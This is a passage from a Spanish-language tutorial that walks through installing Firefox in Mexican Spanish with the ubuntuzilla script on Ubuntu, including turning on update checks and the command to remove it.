En el siguiente paso nos mostrara una lista para elegir la localización (idioma) para Firefox. En mi caso tecleo 19.



You have chosen localization es-MX. Is that correct [y/n]? Please enter 'y' or 'n':

Nos pregunta si estamos en lo correcto en nuestra eleccion, le decimos que si tecleando la letra "y". Hecho lo anterior pasara a descargarse firefox.



Al finalizar la descarga automáticamente empezara la instalación de firefox y nos preguntara si nos gustaría activar la funcion que comprobará regularmente actualizaciones para Firefox. Solo tecleamos una "y" para activar la funcion.



Con esto terminamos la instalación de firefox totalmente actualizado y en nuestro idioma.



Si queremos remover el proceso por alguna razon, solo hacemos lo siguiente.

# ubuntuzilla.py -a remove -p firefox

Referencias:
http://sourceforge.net/apps/mediawiki/ubuntuzilla/index.php?title=Main_Page